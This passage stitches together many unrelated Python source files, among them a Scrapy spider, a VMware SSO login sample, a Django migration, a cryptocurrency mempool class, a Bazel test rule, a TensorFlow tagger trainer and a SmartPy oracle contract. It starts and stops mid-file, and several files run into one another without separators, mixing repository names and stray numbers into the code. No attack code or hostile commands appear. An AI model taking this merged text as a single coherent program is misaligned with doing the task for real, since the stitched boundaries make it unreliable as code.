self.r.llen(self.redis_key) == 0 and self.idling == True: self.logger.info(self.r.smembers(self.error_set_key)) keys = self.r.keys(f'{self.name}*') for k in keys: self.r.delete(k) self.crawler.engine.close_spider( spider=self, reason="CorpAZ is closed; Queue is empty; Processed everything") self.close_status() def make_request_from_data(self, ticker, pageSize): """ Replaces the default method, data is a ticker. 
""" ctp["formdata"]["code"] = ticker ctp["formdata"]["PageSize"] = pageSize ctp["formdata"]["ToDate"] = self.date ctp["meta"]["ticker"] = ticker ctp["meta"]["counted"] = "1" return FormRequest(url=ctp["url"], formdata=ctp["formdata"], headers=ctp["headers"], cookies=ctp["cookies"], meta=ctp["meta"], callback=self.parse, errback=self.handle_error ) def parse(self, response): if response: ticker = response.meta['ticker'] report_type = response.meta['ReportType'] page = response.meta['page'] counted = int(response.meta['counted']) try: resp_json = json.loads(response.text, encoding='utf-8') if counted == 0: pageSize = int(resp_json) + 1 self.r.lpush(f'{self.name}:tickers', f'{ticker};{pageSize}') self.logger.info(f'CRAWLING {pageSize} COUNTERPARTS OF {ticker}') else: ### Saving local data files # save_jsonfile( # resp_json, filename=f'localData/{self.name}/{ticker}_{self.name}.json') # ES push task handleES_task.delay(self.name.lower(), ticker, resp_json) self.r.srem(self.error_set_key, f'{ticker};{page};{report_type}') self.logger.info(f'CRAWLED COUNTERPARTS OF {ticker}') except: self.logger.info("Response is an empty string") self.r.sadd(self.error_set_key, f'{ticker};{page};{report_type}') """ qwikstart.exceptions ----------------------- All exceptions used in the qwikstart code base are defined here. """ class QwikstartException(Exception): """Base exception class. All qwikstart-specific exceptions should subclass this.""" class RepoLoaderError(QwikstartException): """Exception raised when loading task specification fails.""" # ---------------------- # User-facing exceptions # ---------------------- class UserFacingError(QwikstartException): """Base exception for errors that are meant to be displayed to users.""" class ConfigurationError(UserFacingError): """User-facing exception raised during qwikstart configuration.""" class ObsoleteError(UserFacingError): """User-facing exception raised for obsolete functionality.""" class OperationError(UserFacingError): """User-facing exception raised during execution of operation.""" class OperationDefinitionError(UserFacingError): """Exception raised when an operation is improperly defined.""" class TaskParserError(UserFacingError): """User-facing exception raised when parsing task specification fails.""" from handlers.base_handler import BaseHandler import tornado.web from models import User class UserHandler(BaseHandler): def get(self): user = User.get_username('') count = self.db_session.query(User).count() self.write('{} users so far!'.format(count)) class UserDetailHandler(tornado.web.RequestHandler): def get(self, user_id): self.write('user id: ' + user_id) from distutils.core import setup setup( name = 'syntaxTrees', packages = ['syntaxTrees'], version = '1.0.0', description = '', long_description = '', author = '', author_email = '', license = 'MIT', package_data={ '': ['*.txt'], }, install_requires=[ ], ) samples/vsphere/sso/embedded_psc_sso_workflow.py100-1000 #!/usr/bin/env python """ * ******************************************************* * Copyright (c) VMware, Inc. 2017. All Rights Reserved. * SPDX-License-Identifier: MIT * ******************************************************* * * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN, * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY, * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE. """ __author__ = 'VMware, Inc.' 
__vcenter_version__ = '6.0+' from vmware.vapi.vsphere.client import create_vsphere_client from com.vmware.cis.tagging_client import (Category, CategoryModel) from samples.vsphere.common import sample_cli from samples.vsphere.common import sample_util from samples.vsphere.common import sso from samples.vsphere.common.ssl_helper import get_unverified_context from samples.vsphere.common.ssl_helper import get_unverified_session class EmbeddedPscSsoWorkflow(object): """ Demonstrates how to Login to vCenter vAPI service with embedded Platform Services Controller. """ def __init__(self): parser = sample_cli.build_arg_parser() self.args = sample_util.process_cli_args(parser.parse_args()) def run(self): print('\n\n#### Example: Login to vCenter server with ' 'embedded Platform Services Controller') # Since the platform services controller is embedded, the sso server # is the same as the vCenter server. sso_url = 'https://{}/sts/STSService'.format(self.args.server) print('\nStep 1: Connect to the Single Sign-On URL and ' 'retrieve the SAML bearer token.') authenticator = sso.SsoAuthenticator(sso_url) context = None if self.args.skipverification: context = get_unverified_context() bearer_token = authenticator.get_bearer_saml_assertion( self.args.username, self.args.password, delegatable=True, ssl_context=context) session = get_unverified_session() if self.args.skipverification else None # Connect to vSphere client client = create_vsphere_client(server=self.args.server, bearer_token=bearer_token, session=session) # Create and Delete TagCategory to Verify connection is successful print('\nStep 3: Creating and Deleting Tag Category...\n') create_spec = client.tagging.Category.CreateSpec() create_spec.name = 'TestTag_embeded_psc_sso_workflow' create_spec.description = 'TestTagDesc' create_spec.cardinality = CategoryModel.Cardinality.MULTIPLE create_spec.associable_types = set() category_id = client.tagging.Category.create(create_spec) assert category_id is not None print('Tag category created; Id: {0}\n'.format(category_id)) # Delete TagCategory client.tagging.Category.delete(category_id) def main(): embedded_psc_sso_workflow = EmbeddedPscSsoWorkflow() embedded_psc_sso_workflow.run() # Start program if __name__ == '__main__': main() andrewbird2/django-data-validation # Generated by Django 3.0.8 on 2020-07-23 18:32 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='CReturnValues', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='IReturnValues', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Parent', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='RelatedFields', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], ), migrations.CreateModel( name='TestModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, 
verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='ExcludedModel', fields=[ ('parent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app1.Parent')), ], options={ 'abstract': False, }, bases=('app1.parent',), ), migrations.CreateModel( name='Relation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ('fkey', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='app1.RelatedFields')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='RelatedFieldsM2M', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('rf', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app1.RelatedFields')), ('rl', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app1.Relation')), ], ), migrations.AddField( model_name='relatedfields', name='fkey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fkey_relation', to='app1.Relation'), ), migrations.AddField( model_name='relatedfields', name='m2m', field=models.ManyToManyField(through='app1.RelatedFieldsM2M', to='app1.Relation'), ), migrations.AddField( model_name='relatedfields', name='o2o', field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='o2o_relation', to='app1.Relation'), ), migrations.CreateModel( name='ProxyModel', fields=[ ], options={ 'proxy': True, 'indexes': [], 'constraints': [], }, bases=('app1.parent',), ), migrations.CreateModel( name='ModelWithExcludedParent', fields=[ ('excludedmodel_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app1.ExcludedModel')), ], options={ 'abstract': False, }, bases=('app1.excludedmodel',), ), ] MasterFrumma/leerleer/core/storage/mempool_tx.py from leer.core.primitives.transaction_skeleton import TransactionSkeleton from leer.core.lubbadubdub.transaction import Transaction from leer.core.utils import ObliviousDictionary from leer.core.primitives.block import generate_block_template, build_tx_from_skeleton from leer.core.parameters.dynamic import next_reward from leer.core.parameters.constants import coinbase_maturity from leer.core.lubbadubdub.ioput import IOput class MempoolTx: #Should be renamed to Mempool since it now holds block_template info ''' This manager holds information about known unconfirmed transaction and provides it for generation of next block and relay, also it holds (unsolved) block templates. self.transactions contains skeletons of known transactions (before merging) self.current_set containt transactions which are 1) downloaded and 2) do not contradict with each other self.short_memory_of_mined_transaction contains transactions which were mined in the last few blocks (we include tx to short_memory_of_mined_transaction if all tx.inputs and tx.outputs were in block_tx). It is necessary for safe rollbacks without losing transactions. 
''' def __init__(self, storage_space): self.transactions = [] self.built_tx = {} self.current_set = [] self.combined_tx = None self.short_memory_of_mined_transaction = {} self.storage_space = storage_space self.storage_space.register_mempool_tx(self) self.block_templates = ObliviousDictionary(sink_delay=6000) self.key_manager = None def update_current_set(self): ''' For now we have quite a simple and dirty algo: 1) sort all tx by input_num (bigger first) 2) iterate through tx and add transactions to current_set if a) it is downloaded b) it is valid (otherwise delete from self.transactions) c) doesn't contradict with any other tx in the set ''' self.transactions = sorted(self.transactions, key = lambda x: len(x.input_indexes), reverse=True) tx_to_remove_list = [] txos_storage = self.storage_space.txos_storage merged_tx = Transaction(txos_storage=txos_storage) for tx_skeleton in self.transactions: #TODO build_tx_from_skeleton should raise distinctive exceptions downloaded = True for _i in tx_skeleton.input_indexes: if not _i in txos_storage.confirmed: downloaded = False for _o in tx_skeleton.output_indexes: if not _o in txos_storage.mempool: downloaded = False if not downloaded: continue try: if tx_skeleton.serialize() in self.built_tx: full_tx = self.built_tx[tx_skeleton.serialize()] else: if tx_skeleton.tx: full_tx = tx_skeleton.tx else: full_tx = build_tx_from_skeleton(tx_skeleton, self.storage_space.txos_storage, self.storage_space.blockchain.current_height +1) tx_skeleton.tx=full_tx self.built_tx[tx_skeleton.serialize()]=full_tx except Exception as e: tx_to_remove_list.append(tx_skeleton) continue try: merged_tx = merged_tx.merge(full_tx) self.current_set.append(tx_skeleton) except: pass #it is ok for tx in tx_to_remove_list: self.transactions.remove(tx) self.built_tx.pop(tx.serialize(), None) self.combined_tx = merged_tx def update(self, reason): self.update_current_set() def give_tx(self): return self.combined_tx def give_tx_skeleton(self): return TransactionSkeleton(tx = self.combined_tx) def add_tx(self,tx): if isinstance(tx, Transaction): tx_skel = TransactionSkeleton(tx=tx) self.built_tx[tx_skel.serialize()]=tx self.transactions.append(tx_skel) elif isinstance(tx,TransactionSkeleton): self.transactions.append(tx) else: raise self.update(reason="Tx addition") def set_key_manager(self, key_manager): self.key_manager = key_manager def give_block_template(self): if not self.key_manager: raise Exception("Key manager is not set") value = next_reward(self.storage_space.blockchain.current_tip, self.storage_space.headers_storage) coinbase = IOput() coinbase.fill(self.key_manager.new_address(), value, relay_fee=0, coinbase=True, lock_height=self.storage_space.blockchain.current_height + 1 + coinbase_maturity) coinbase.generate() self.storage_space.txos_storage.mempool[coinbase.serialized_index]=coinbase tx=Transaction(txos_storage = self.storage_space.txos_storage, key_manager= self.key_manager) tx.add_coinbase(coinbase) tx.compose_block_transaction() block = generate_block_template(tx, self.storage_space) self.add_block_template(block) return block def add_block_template(self, block): self.block_templates[block.header.template] = block def get_block_by_header_solution(self, header): if not header.template in self.block_templates: raise Exception("Unknown template") block = self.block_templates[header.template] block._header = header return block #This block is already ready to be added to blockchain (PoW is not checked, though) 0 # Copyright 2017 The Bazel Authors. All rights reserved. 
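# --- Illustrative sketch (not part of the mempool module above): update_current_set sorts
# transaction skeletons by number of inputs (largest first) and greedily merges each one into
# a combined transaction, skipping any that fail to merge. The generic helper below mirrors
# that pattern; it assumes, as the source does, that merge() raises on a conflicting candidate
# and that candidates expose an input_indexes list.
def greedy_merge(candidates, empty, key=lambda tx: len(tx.input_indexes)):
    """Fold non-conflicting candidates (largest first) into one combined object."""
    combined = empty
    accepted = []
    for cand in sorted(candidates, key=key, reverse=True):
        try:
            combined = combined.merge(cand)  # raises if cand conflicts with combined
            accepted.append(cand)
        except Exception:
            continue  # conflicting candidate: leave it for a later round
    return combined, accepted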
# # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """A wrapper around container structure tests for Bazel. This rule feeds a built image and a set of config files to the container structure test framework." """ load( "//container:bundle.bzl", "container_bundle", ) def _impl(ctx): if len([x for x in [ctx.attr.image, ctx.file.image_tar, ctx.file.image_config] if x]) != 1: fail("Exactly one of 'image', 'image_tar', 'image_config' must be specified") args = ["test", "--driver", ctx.attr.driver] if ctx.file.image_tar: # no need to load if we're using raw tar load_statement = "" args += ["--image", ctx.file.image_tar.short_path] runfiles = ctx.runfiles( files = [ctx.executable._structure_test, ctx.file.image_tar] + ctx.files.configs, ) elif ctx.file.image_config: load_statement = "" args += ["--metadata", ctx.file.image_config.short_path, "--force", True] runfiles = ctx.runfiles( files = [ctx.executable._structure_test, ctx.file.image_config] + ctx.files.configs, ) else: load_statement = "%s --norun" % ctx.executable.image.short_path args += ["--image", ctx.attr.loaded_name] runfiles = ctx.runfiles( files = [ctx.executable._structure_test, ctx.executable.image] + ctx.files.configs, transitive_files = ctx.attr.image[DefaultInfo].files, ).merge(ctx.attr.image[DefaultInfo].data_runfiles) if not ctx.attr.verbose: args += ["--quiet"] for c in ctx.files.configs: args += ["--config", c.short_path] # Generate a shell script to execute structure_tests with the correct flags. ctx.actions.expand_template( template = ctx.file._structure_test_tpl, output = ctx.outputs.executable, substitutions = { "%{args}": " ".join(args), "%{load_statement}": load_statement, "%{test_executable}": ctx.executable._structure_test.short_path, }, is_executable = True, ) return [DefaultInfo(runfiles = runfiles)] _container_test = rule( attrs = { "configs": attr.label_list( mandatory = True, allow_files = True, ), "driver": attr.string( default = "docker", doc = "Driver to use when running structure tests. 
Valid values are docker, host and tar", mandatory = False, values = [ "docker", "host", "tar", ], ), "image": attr.label( doc = "When using the docker driver, label of the incremental loader", executable = True, cfg = "target", ), "image_config": attr.label( doc = "When using the host driver, label of the container metadata file", allow_single_file = [".json", ".yaml", ".yml"], ), "image_tar": attr.label( doc = "When using the tar driver, label of the container image tarball", allow_single_file = [".tar"], ), "loaded_name": attr.string( doc = "When using the docker driver, the name:tag of the image when loaded into the docker daemon", ), "verbose": attr.bool( default = False, mandatory = False, ), "_structure_test": attr.label( default = Label("//contrib:structure_test_executable"), cfg = "target", executable = True, allow_files = True, ), "_structure_test_tpl": attr.label( default = Label("//contrib:structure-test.sh.tpl"), allow_single_file = True, ), }, executable = True, test = True, toolchains = ["@io_bazel_rules_docker//toolchains/docker:toolchain_type"], implementation = _impl, ) def container_test(name, image, configs, driver = None, verbose = None, **kwargs): """Renames the image under test before threading it to the container test rule. See also https://github.com/GoogleContainerTools/container-structure-test Args: name: The name of this container_test rule image: The image to use for testing configs: List of YAML or JSON config files with tests driver: Driver to use when running structure tests verbose: Turns on/off verbose logging. Default False. **kwargs: Attrs to pass through """ image_loader = None image_tar = None image_config = None loaded_name = None if driver == "tar": image_tar = image + ".tar" elif driver == "host": image_config = image + ".json" else: # Give the image a predictable name when loaded image_loader = "%s.image" % name # Remove commonly encountered characters that Docker will choke on. # Include the package name in the new image tag to avoid conflicts on naming # when running multiple container_test on images with the same target name # from different packages. 
sanitized_name = (native.package_name() + image).replace(":", "").replace("@", "").replace("/", "") loaded_name = "%s:intermediate" % sanitized_name container_bundle( name = image_loader, images = { loaded_name: image, }, ) _container_test( name = name, loaded_name = loaded_name, image = image_loader, image_tar = image_tar, image_config = image_config, configs = configs, verbose = verbose, driver = driver, **kwargs ) from splitwise import Splitwise import unittest try: from unittest.mock import patch except ImportError: # Python 2 from mock import patch @patch('splitwise.Splitwise._Splitwise__makeRequest') class GetCurrenciesTestCase(unittest.TestCase): def setUp(self): self.sObj = Splitwise('consumerkey', 'consumersecret') def test_getCurrencies_success(self, mockMakeRequest): mockMakeRequest.return_value = '{"currencies":[{"currency_code":"AED","unit":"DH"},{"currency_code":"AFN","unit":"Afs"},{"currency_code":"ALL","unit":"L"}]}' # noqa: E501 currencies = self.sObj.getCurrencies() mockMakeRequest.assert_called_with( "https://secure.splitwise.com/api/v3.0/get_currencies") self.assertEqual(len(currencies), 3) self.assertEqual(currencies[0].getCode(), "AED") self.assertEqual(currencies[0].getUnit(), "DH") self.assertEqual(currencies[1].getCode(), "AFN") self.assertEqual(currencies[1].getUnit(), "Afs") self.assertEqual(currencies[2].getCode(), "ALL") self.assertEqual(currencies[2].getUnit(), "L") def test_getCurrencies_exception(self, mockMakeRequest): mockMakeRequest.side_effect = Exception( "Invalid response %s. Please check your consumer key and secret." % 404) with self.assertRaises(Exception): self.sObj.getCurrencies() mockMakeRequest.assert_called_with( "https://secure.splitwise.com/api/v3.0/get_currencies") """User models.""" import secrets from datetime import datetime, timedelta from marshmallow import Schema, fields from marshmallow.validate import Length from muckr_api.extensions import bcrypt from muckr_api.extensions import database as db class User(db.Model): __tablename__ = "users" id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(64), index=True, unique=True) email = db.Column(db.String(120), index=True, unique=True) password_hash = db.Column(db.String(128)) token = db.Column(db.String(64), index=True, unique=True) token_expiration = db.Column(db.DateTime) is_admin = db.Column(db.Boolean, default=False) artists = db.relationship("Artist", backref="user", lazy="dynamic") venues = db.relationship("Venue", backref="user", lazy="dynamic") def __repr__(self): return "".format(self.username) def set_password(self, password): data = bcrypt.generate_password_hash(password) self.password_hash = data.decode("utf-8") def check_password(self, password): return bcrypt.check_password_hash(self.password_hash, password) def get_token(self, expires_in=3600): now = datetime.utcnow() if self.token and self.token_expiration > now + timedelta(seconds=60): return self.token self.token = secrets.token_hex(32) self.token_expiration = now + timedelta(seconds=expires_in) db.session.add(self) return self.token def revoke_token(self): if self.token is not None: self.token_expiration = datetime.utcnow() - timedelta(seconds=1) @staticmethod def check_token(token): user = User.query.filter_by(token=token).first() if ( user is not None and user.token_expiration is not None and user.token_expiration > datetime.utcnow() ): return user class UserSchema(Schema): id = fields.Integer(dump_only=True) username = fields.Str(required=True, validate=Length(min=1)) email = 
fields.Email(required=True) password = fields.Str(load_only=True, required=True) jbauermanncode/Curso_Em_Video_PythonPython_Exercicios/Mundo2/Condições em Python (if..elif)/python_037.py ''' Escreva um programa em Python que leia um número inteiro qualquer e peça para o usuário escolher qual será a base de conversão: 1 para binário, 2 para octal e 3 para hexadecimal. ''' # Ler um número inteiro e definr a base n = int(input('Digite um número: ')) base = int(input('Em qual base será feita a conversão? ')) print('[1] Para Binário') print('[2] Para Octal') print('[3] Para Hexadecimal') # Conversão para binário, hexadecimal, octal, com Estrutura Condicional if, elif, else. if base == 1: print('O número {}, fica {} em binário.'.format(n, bin(n)[2:])) elif base == 2: print('O número {}, fica {} em octal.'.format(n, oct(n)[2:])) elif base == 3: print('O número {}, fica {} em hexadecimal.'.format(n, hex(n)[2:])) else: print('O número de base não está listado')import random def power(base , pow): answer = 1 for index in range(pow): answer = answer * base return answer def percentage(value , total): percentage = (value / total) * 100 return percentage10-100 import os import tensorflow as tf from tensorflow.python.keras.layers import ( Embedding, Bidirectional, LSTM, BatchNormalization, ) from tensorflow.python.keras.models import Sequential from ioflow.configure import read_configure from ioflow.corpus import get_corpus_processor from seq2annotation.input import generate_tagset, Lookuper, index_table_from_file from seq2annotation.trainer.keras_utils import export_as_deliverable_model from seq2annotation.utils import create_dir_if_needed, create_file_dir_if_needed from tf_attention_layer.layers.global_attentioin_layer import GlobalAttentionLayer from tf_crf_layer.layer import CRF from tf_crf_layer.loss import ConditionalRandomFieldLoss from tf_crf_layer.metrics import SequenceCorrectness, SequenceSpanAccuracy from deliverable_model.builtin.converter.identical_converters import ( ConverterForRequest, ConverterForResponse, ) from tokenizer_tools.tagset.converter.offset_to_biluo import offset_to_biluo # tf.enable_eager_execution() def main(): config = read_configure() corpus = get_corpus_processor(config) corpus.prepare() train_data_generator_func = corpus.get_generator_func(corpus.TRAIN) eval_data_generator_func = corpus.get_generator_func(corpus.EVAL) corpus_meta_data = corpus.get_meta_info() tags_data = generate_tagset(corpus_meta_data["tags"]) train_data = list(train_data_generator_func()) eval_data = list(eval_data_generator_func()) tag_lookuper = Lookuper({v: i for i, v in enumerate(tags_data)}) vocab_data_file = config.get("vocabulary_file") if not vocab_data_file: # load built in vocabulary file vocab_data_file = os.path.join( os.path.dirname(__file__), "../data/unicode_char_list.txt" ) print("using default data file: {}".format(vocab_data_file)) else: print("using custom vocab data file: {}".format(vocab_data_file)) vocabulary_lookuper = index_table_from_file(vocab_data_file, config.get("vocabulary_config", {})) def preprocss(data, maxlen): raw_x = [] raw_y = [] for offset_data in data: tags = offset_to_biluo(offset_data) words = offset_data.text tag_ids = [tag_lookuper.lookup(i) for i in tags] word_ids = [vocabulary_lookuper.lookup(i) for i in words] raw_x.append(word_ids) raw_y.append(tag_ids) if maxlen is None: maxlen = max(len(s) for s in raw_x) print(">>> maxlen: {}".format(maxlen)) x = tf.keras.preprocessing.sequence.pad_sequences( raw_x, maxlen, padding="post" ) # right padding # lef 
padded with -1. Indeed, any integer works as it will be masked # y_pos = pad_sequences(y_pos, maxlen, value=-1) # y_chunk = pad_sequences(y_chunk, maxlen, value=-1) y = tf.keras.preprocessing.sequence.pad_sequences( raw_y, maxlen, value=0, padding="post" ) return x, y MAX_SENTENCE_LEN = config.get("max_sentence_len", 25) train_x, train_y = preprocss(train_data, MAX_SENTENCE_LEN) test_x, test_y = preprocss(eval_data, MAX_SENTENCE_LEN) EPOCHS = config["epochs"] EMBED_DIM = config["embedding_dim"] USE_ATTENTION_LAYER = config.get("use_attention_layer", False) BiLSTM_STACK_CONFIG = config.get("bilstm_stack_config", []) BATCH_NORMALIZATION_AFTER_EMBEDDING_CONFIG = config.get( "use_batch_normalization_after_embedding", False ) BATCH_NORMALIZATION_AFTER_BILSTM_CONFIG = config.get( "use_batch_normalization_after_bilstm", False ) CRF_PARAMS = config.get("crf_params", {}) vacab_size = vocabulary_lookuper.size() tag_size = tag_lookuper.size() model = Sequential() model.add( Embedding(vacab_size, EMBED_DIM, mask_zero=True, input_length=MAX_SENTENCE_LEN) ) if BATCH_NORMALIZATION_AFTER_EMBEDDING_CONFIG: model.add(BatchNormalization()) for bilstm_config in BiLSTM_STACK_CONFIG: model.add(Bidirectional(LSTM(return_sequences=True, **bilstm_config))) if BATCH_NORMALIZATION_AFTER_BILSTM_CONFIG: model.add(BatchNormalization()) if USE_ATTENTION_LAYER: model.add(GlobalAttentionLayer()) model.add(CRF(tag_size, name="crf", **CRF_PARAMS)) # print model summary model.summary() callbacks_list = [] tensorboard_callback = tf.keras.callbacks.TensorBoard( log_dir=create_dir_if_needed(config["summary_log_dir"]) ) callbacks_list.append(tensorboard_callback) checkpoint_callback = tf.keras.callbacks.ModelCheckpoint( os.path.join(create_dir_if_needed(config["model_dir"]), "cp-{epoch:04d}.ckpt"), load_weights_on_restart=True, verbose=1, ) callbacks_list.append(checkpoint_callback) metrics_list = [] metrics_list.append(SequenceCorrectness()) metrics_list.append(SequenceSpanAccuracy()) loss_func = ConditionalRandomFieldLoss() # loss_func = crf_loss model.compile("adam", loss={"crf": loss_func}, metrics=metrics_list) model.fit( train_x, train_y, epochs=EPOCHS, validation_data=[test_x, test_y], callbacks=callbacks_list, ) # Save the model model.save(create_file_dir_if_needed(config["h5_model_file"])) tf.keras.experimental.export_saved_model( model, config["saved_model_dir"] ) export_as_deliverable_model( create_dir_if_needed(config["deliverable_model_dir"]), keras_saved_model=config["saved_model_dir"], converter_for_request=ConverterForRequest(), converter_for_response=ConverterForResponse(), vocabulary_lookup_table=vocabulary_lookuper, tag_lookup_table=tag_lookuper, padding_parameter={"maxlen": MAX_SENTENCE_LEN, "value": 0, "padding": "post"}, addition_model_dependency=["tf-crf-layer"], custom_object_dependency=["tf_crf_layer"], ) if __name__ == "__main__": main() 0 #!/usr/bin/env python # coding=utf-8 from django.conf.urls import url from . 
import views app_name = 'polls' urlpatterns = [ url(r'^$', views.IndexView.as_view(), name='index'), ] import setuptools as ok with open('README.md') as f: urmom = f.read() ok.setup( author="https://hentaihaven.dev/", author_email="", name='hentaihavendev', license="MIT", description='an api wrapper for https://api.hentaihaven.dev/', version='v0.1', long_description=urmom, url='https://github.com/unsecuring/hentaihavendev', packages=ok.find_packages(where="hentaihavendev"), install_requires=['requests'], package_dir={"": "hentaihavendev"}, )def foo3(x, y): i = x + y return i s = """ .a.fy int z """ from fython.test import * # shell('rm -rf a/ a.* b.*') # writer(s) w = load('.a', release=1, verbose=0, run_main=0) print(open(w.module.url.fortran_path, 'r').read()) s = """ .b.fy import .a(*) print '{:z}' """ # writer(s) w = load('.b', release=1, verbose=0, run_main=0) print(open(w.module.url.fortran_path, 'r').read()) oro-contract/btcusd-oracle-contract.py import smartpy as sp class BitcoinToCurrencyDataOracle(sp.Contract): def __init__(self, admin): self.init(conversionData = sp.map(tkey = sp.TString, tvalue = sp.TRecord(buy=sp.TInt,sell=sp.TInt)), keysset = sp.set([admin]) , owner = admin) @sp.entry_point def feedData(self,params): sp.if (self.data.keysset.contains(sp.sender)): self.data.conversionData[params.currency] = sp.record(buy = params.buy, sell = params.sell) @sp.entry_point def addDataContributor(self,params): sp.if sp.sender == self.data.owner: self.data.keysset.add(params.contributor) @sp.entry_point def getDataFromOrO(self,params): errcd = sp.record(buy = 0,sell=0) contract = sp.contract(sp.TRecord(buy = sp.TInt, sell = sp.TInt),sp.sender,entry_point = "receiveDataFromOrO").open_some() sp.if sp.amount == sp.mutez(5000): sp.transfer(self.data.conversionData[params.currency],sp.mutez(0),contract) sp.else: sp.transfer(errcd,sp.amount,contract) @sp.add_test(name="BTCUSDTest") def test(): scenario = sp.test_scenario() oracle = BitcoinToCurrencyDataOracle(sp.address('tz1beX9ZDev6SVVW9yJwNYA89362ZpWuDwou')) scenario += oracle scenario += oracle.feedData(currency = "USD", buy = 7098 , sell = 7097).run(sender=sp.address('tz1beX9ZDev6SVVW9yJwNYA89362ZpWuDwou')) scenario += oracle.feedData(currency = "INR", buy = 545791 , sell = 545791).run(sender=sp.address('tz1-AAA')) scenario += oracle.addDataContributor(contributor=sp.address("tz1-AAA")).run(sender=sp.address('tz1beX9ZDev6SVVW9yJwNYA89362ZpWuDwou')) scenario += oracle.feedData(currency = "INR", buy = 545791 , sell = 545791).run(sender=sp.address('tz1-AAA')) scenario += oracle.getDataFromOrO(currency = "INR").run(sender=sp.address("KT1-AAA") , amount = sp.mutez(5000)) scenario += oracle.getDataFromOrO(currency = "INR").run(sender=sp.address("KT1-BBB") , amount = sp.mutez(4000)) """ The test a == b is evaluated O(n2) times. The rest of the time spent depends upon how many matching (a,b) pairs exist. As we have noted, there are at most n such pairs, and so the management of the loop over C, and the commands within the body of that loop, use at most O(n2) time. 
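Concretely (hypothetical sizes): with n = 1,000 elements per set this is on
the order of 10^6 comparisons, versus roughly 10^9 for the naive triple loop,
which is the improvement over O(n^3) noted in the comments below.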
""" # Overall complexity: O(n ** 2) def disjoint2(A, B, C): for a in A: for b in B: if a == b: for c in C: # O(n**2) not n ** 3 if a == c: return False return True if __name__ == "__main__": a = {1, 2, 3} b = {3, 4, 5} c = {5, 6, 7} print("Three sets {}, {}, and {} are disjoint: {}".format(a, b, c, disjoint2(a, b, c)) ) a = {1, 2, 3} b = {3, 2, 5} c = {5, 6, 2} print("Three sets {}, {}, and {} are disjoint: {}".format(a, b, c, disjoint2(a, b, c)) )# coding: utf-8 # Distributed under the terms of the MIT License. import numpy as np from matador.utils.cell_utils import real2recip, frac2cart from matador.orm.orm import DataContainer class Spectral(DataContainer): """ Note: This class speaks of "k-points" as general reciprocal space points used to display the dispersion curves; these correspond to CASTEP's phonon_kpoints or spectral_kpoints, and not the k-points used to generate the underlying wavefunction or dynamical matrix. """ @property def eigs(self): """ Alias for the correct eigenvalue array. """ if 'Vibrational' in self.__class__.__name__: return self._data['eigs_q'] return self._data['eigs_s_k'] @property def lattice_cart(self): """ The Cartesian lattice vectors of the real space lattice. """ return self._data['lattice_cart'] @property def num_kpoints(self): """ Number of dispersion k-points sampled. """ return self._data['num_kpoints'] @property def num_qpoints(self): """ Alias for number of kpoints. """ return self.num_kpoints @property def projectors(self): """ Return list of projector labels in the format `(element, l-channel)`. """ return self._data.get('projectors') @property def num_modes(self): """ Number of eigenvalues per q/k-point. """ return self._data['num_modes'] @property def num_bands(self): """ Number of eigenvalues per q/k-point. """ if 'Vibrational' in self.__class__.__name__: return self._data['num_modes'] return self._data['num_bands'] @property def projector_weights(self): """ Return the array of projector weights per eigval, with shape (num_projectors, num_kpoints, num_bands). """ return self._data.get('projector_weights') @property def num_projectors(self): """ Return the number of projectors. """ if self.projectors is None: return 0 return len(self.projectors) @property def kpoint_branches(self): """ Return the k-point branches in the older format, which contained a list of lists of continous indices. """ if self._data.get('kpoint_branches') is None: self._data['kpoint_branches'] = self.find_full_kpt_branch() return self._data['kpoint_branches'] @property def kpoint_branch_start(self): """ Return the indices of the start of branches. """ if not self._data.get('kpoint_branch_start'): self.set_branches_and_spacing() return self._data['kpoint_branch_start'] @property def kpoint_path_spacing(self): """ An estimated kpoint spacing. """ if not self._data.get('kpoint_path_spacing'): self.set_branches_and_spacing() return self._data['kpoint_path_spacing'] @property def kpoint_path(self): """ The fractional sampling 